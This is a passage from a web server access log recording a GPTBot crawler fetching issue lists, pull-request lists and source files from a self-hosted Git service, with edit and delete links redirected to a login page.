AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:19:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:19:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 11140] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:19:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:24:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 2414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 9827] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 928] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11868] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 22757] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:19:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 